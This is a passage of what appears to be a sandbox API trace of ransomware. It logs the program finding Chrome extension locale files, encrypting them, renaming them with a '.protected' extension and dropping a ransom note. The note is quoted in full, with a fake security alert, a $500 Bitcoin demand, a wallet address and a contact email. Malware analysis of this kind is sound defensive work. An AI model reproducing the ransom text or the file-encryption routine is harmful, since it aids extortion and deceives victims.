(lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.122] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.122] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.122] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.122] CloseHandle (hObject=0x164) returned 1 [0079.122] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.122] lstrcmpiW (lpString1="zh_CN", lpString2="Windows") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="Program Files (x86)") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="$Recycle.bin") returned 1 [0079.123] lstrcmpiW (lpString1="zh_CN", lpString2="System Volume Information") returned 1 [0079.123] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN") returned 144 [0079.123] lstrcmpW (lpString1="zh_CN", lpString2=".") returned 1 [0079.123] lstrcmpW (lpString1="zh_CN", lpString2="..") returned 1 [0079.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*") returned 146 [0079.123] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.123] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.123] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.123] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.123] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.123] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\.") returned 146 [0079.123] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.123] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.123] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.123] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.123] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.123] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.123] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.123] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\..") returned 147 [0079.123] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.123] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.123] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.123] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.123] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.124] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.124] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.124] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.124] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.124] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.124] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.124] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.124] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.124] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json") returned 158 [0079.124] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.124] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.125] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.125] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.125] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.126] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.126] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.126] CloseHandle (hObject=0x168) returned 1 [0079.126] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.protected") returned 168 [0079.126] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\messages.json.protected")) returned 1 [0079.127] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.127] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.127] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt") returned 162 [0079.127] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_CN\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_cn\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.127] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.127] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.128] lstrlenA (lpString="/EUjl9MVeTXnlG/XQZNvwyITZa7BXUqiB5mj424hEYN2560qP6EWyldVLx6eKwW6WOEgf3pcjq0dW0RAvXRHEgiXZDUWQoLVVxw2NYqa6/J5djdAg1ybYJXnCAE12B7erROTQqHtc07YOrZdJvhx+3AjMJGsfnCSULXbX2/IqlW5UKzMzdVnUXFczFH9vnQaoI9XzVuBNbzMzJBoJR+ewiq+5nNFZL3ICdLtV523DicenBCgk1LFMBQUsrO3zbBh4mmsKg+skrUs+1Qc/9MGAUJlUVe23aJJKbQ6+IEVXuH184d/lapSkDKNbtrqWAqNhW9X8CAQhiOVyP+5+Qs2NqC778I4bzykfAS8xv8VVOY9XTkR6ym0EOqm1KYED9fJke16razCmo+CWD5Yq6NX3vZjkWOsbvFJcqdBpk89KPzvrYrv+JDljiezm3ysUD5K9W6+SzxYxurYTCPFLhUEyrh3UipsVj0LuMpJIZDAwy9qHbLfu/4CD+vlQc11WRi4xfoisfRvx5IZejrzHUM/5dd2AVbZVdN/j5PysPyy5fMniftmNAv01mZaTQGznUv1A/n+OUKJKLwmFHKdZSV3XI/czldNV04fTfL6V0w4ITxL/7dQB3cs/JrP7L/D2xolnVMHgCw8M8DhTu+OiDnJTlbwaAmPEiR18q12N+80Ckc=") returned 684 [0079.128] WriteFile (in: hFile=0x164, lpBuffer=0x447448*, nNumberOfBytesToWrite=0x2ac, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x447448*, lpNumberOfBytesWritten=0x295d914*=0x2ac, lpOverlapped=0x0) returned 1 [0079.128] lstrlenA (lpString="\r\n------------------------------------------------------------------------------\r\nFor any questions, write us: secureserver@memeware.net\r\nMEMEWARE SECURE-SERVER SYSTEMS (c) 2018") returned 177 [0079.128] WriteFile (in: hFile=0x164, lpBuffer=0xf018d0*, nNumberOfBytesToWrite=0xb1, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf018d0*, lpNumberOfBytesWritten=0x295d914*=0xb1, lpOverlapped=0x0) returned 1 [0079.128] CloseHandle (hObject=0x164) returned 1 [0079.128] FindNextFileW (in: hFindFile=0x47bbd0, lpFindFileData=0x295dba0 | out: lpFindFileData=0x295dba0) returned 1 [0079.128] lstrcmpiW (lpString1="zh_TW", lpString2="Windows") returned 1 [0079.128] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files") returned 1 [0079.129] lstrcmpiW (lpString1="zh_TW", lpString2="Program Files (x86)") returned 1 [0079.129] lstrcmpiW (lpString1="zh_TW", lpString2="$Recycle.bin") returned 1 [0079.129] lstrcmpiW (lpString1="zh_TW", lpString2="System Volume Information") returned 1 [0079.129] wnsprintfW (in: pszDest=0xcf1098, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW") returned 144 [0079.129] lstrcmpW (lpString1="zh_TW", lpString2=".") returned 1 [0079.129] lstrcmpW (lpString1="zh_TW", lpString2="..") returned 1 [0079.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\*" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*") returned 146 [0079.129] FindFirstFileW (in: lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\*", lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0x47bc10 [0079.129] lstrcmpiW (lpString1=".", lpString2="Windows") returned -1 [0079.129] lstrcmpiW (lpString1=".", lpString2="Program Files") returned -1 [0079.129] lstrcmpiW (lpString1=".", lpString2="Program Files (x86)") returned -1 [0079.129] lstrcmpiW (lpString1=".", lpString2="$Recycle.bin") returned 1 [0079.129] lstrcmpiW (lpString1=".", lpString2="System Volume Information") returned -1 [0079.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\.") returned 146 [0079.129] lstrcmpW (lpString1=".", lpString2=".") returned 0 [0079.129] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.129] lstrcmpiW (lpString1="..", lpString2="Windows") returned -1 [0079.129] lstrcmpiW (lpString1="..", lpString2="Program Files") returned -1 [0079.129] lstrcmpiW (lpString1="..", lpString2="Program Files (x86)") returned -1 [0079.129] lstrcmpiW (lpString1="..", lpString2="$Recycle.bin") returned 1 [0079.129] lstrcmpiW (lpString1="..", lpString2="System Volume Information") returned -1 [0079.129] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\..") returned 147 [0079.129] lstrcmpW (lpString1="..", lpString2=".") returned 1 [0079.129] lstrcmpW (lpString1="..", lpString2="..") returned 0 [0079.129] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 1 [0079.129] lstrcmpiW (lpString1="messages.json", lpString2="Windows") returned -1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files") returned -1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="Program Files (x86)") returned -1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="$Recycle.bin") returned 1 [0079.130] lstrcmpiW (lpString1="messages.json", lpString2="System Volume Information") returned -1 [0079.130] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrIW (lpFirst="messages.json", lpSrch=".protected") returned 0x0 [0079.130] lstrcmpW (lpString1="messages.json", lpString2="RESTORE_FILES.txt") returned -1 [0079.130] CryptGenRandom (in: hProv=0x444d38, dwLen=0x20, pbBuffer=0x295d8cc | out: pbBuffer=0x295d8cc) returned 1 [0079.130] CryptEncrypt (in: hKey=0x444cf8, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x20, dwBufLen=0x30 | out: pbData=0x48ea38*, pdwDataLen=0x295d8f4*=0x30) returned 1 [0079.130] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x168 [0079.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrW (lpFirst="messages.json", lpSrch=".txt") returned 0x0 [0079.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrW (lpFirst="messages.json", lpSrch=".rar") returned 0x0 [0079.130] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json") returned 158 [0079.130] StrStrW (lpFirst="messages.json", lpSrch=".zip") returned 0x0 [0079.130] ReadFile (in: hFile=0x168, lpBuffer=0xd11128, nNumberOfBytesToRead=0x2800, lpNumberOfBytesRead=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesRead=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.131] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0xffffff32, lpNewFilePointer=0xffffffff, dwMoveMethod=0x0 | out: lpNewFilePointer=0xffffffff) returned 1 [0079.131] WriteFile (in: hFile=0x168, lpBuffer=0xd11128*, nNumberOfBytesToWrite=0xce, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xd11128*, lpNumberOfBytesWritten=0x295d914*=0xce, lpOverlapped=0x0) returned 1 [0079.131] SetFilePointerEx (in: hFile=0x168, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x0 | out: lpNewFilePointer=0x0) returned 1 [0079.132] WriteFile (in: hFile=0x168, lpBuffer=0x295d8ec*, nNumberOfBytesToWrite=0x4, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x295d8ec*, lpNumberOfBytesWritten=0x295d914*=0x4, lpOverlapped=0x0) returned 1 [0079.132] WriteFile (in: hFile=0x168, lpBuffer=0x48ea38*, nNumberOfBytesToWrite=0x30, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0x48ea38*, lpNumberOfBytesWritten=0x295d914*=0x30, lpOverlapped=0x0) returned 1 [0079.132] CloseHandle (hObject=0x168) returned 1 [0079.132] wnsprintfW (in: pszDest=0xd11128, cchDest=32767, pszFmt="%s%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.protected") returned 168 [0079.132] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\messages.json.protected" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\messages.json.protected")) returned 1 [0079.133] FindNextFileW (in: hFindFile=0x47bc10, lpFindFileData=0x295d930 | out: lpFindFileData=0x295d930) returned 0 [0079.133] FindClose (in: hFindFile=0x47bc10 | out: hFindFile=0x47bc10) returned 1 [0079.133] wnsprintfW (in: pszDest=0xd010e0, cchDest=32767, pszFmt="%s\\%s" | out: pszDest="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt") returned 162 [0079.133] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\AppData\\Local\\Google\\Chrome\\User Data\\Default\\Extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_TW\\RESTORE_FILES.txt" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\appdata\\local\\google\\chrome\\user data\\default\\extensions\\aohghmighlieiainnegkcijnfilokake\\0.9_0\\_locales\\zh_tw\\restore_files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x164 [0079.133] lstrlenA (lpString="! SYSTEM SECURITY ALERT !\r\n-----------------------------------------------------------------------------\r\nYour SERVER was tried to be attacked by an outsider.\r\nImmediatly change your password, use a minimum of 8 characters in length.\r\n-----------------------------------------------------------------------------\r\n\r\nAll your personal files was encrypted with RSA public key (1024 bit) to SAVE them from a third party persons. \r\nNow they are ENCRYPTED and SAFE!\r\n\r\nTo RESTORE all your files back immediatly, follow this few simple steps:\r\n\r\n1) Our SECURE-SERVER service charge a payment for file decryption and preventing damage of your SERVER by 3th party persons;\r\n2) After your SUCCESSFUL payment, write us an E-MAIL with your unique SERVER-ID and payment ID;\r\n3) Receive an DECRYPTION TOOL from us back to your E-MAIL;\r\n4) Run the tool on your SERVER and safe-decrypt all your files back to NORMAL state.\r\n\r\nWe STRONGLY RECOMMEND you NOT to use any other decryption tool, files will be LOST!\r\n\r\nWe guarantee:\r\n\r\n100% Successful restoring all of your files\r\n100% Satisfaction guarantee\r\n100% Safe and secure service\r\n\r\n------------------------------------------------------------------------------\r\n\r\nOur E-MAIL: secureserver@memeware.net\r\nPayment type: Bitcoin\r\nSum: $500\r\nOur wallet: 1CfMU2eKnajfpnYvLbWR3m7jZRXujtx8Cm\r\nYour SERVER-ID:\r\n") returned 1341 [0079.133] WriteFile (in: hFile=0x164, lpBuffer=0xf01390*, nNumberOfBytesToWrite=0x53d, lpNumberOfBytesWritten=0x295d914, lpOverlapped=0x0 | out: lpBuffer=0xf01390*, lpNumberOfBytesWritten=0x295d914*=0x53d, lpOverlapped=0x0) returned 1 [0079.134] lstrlenA 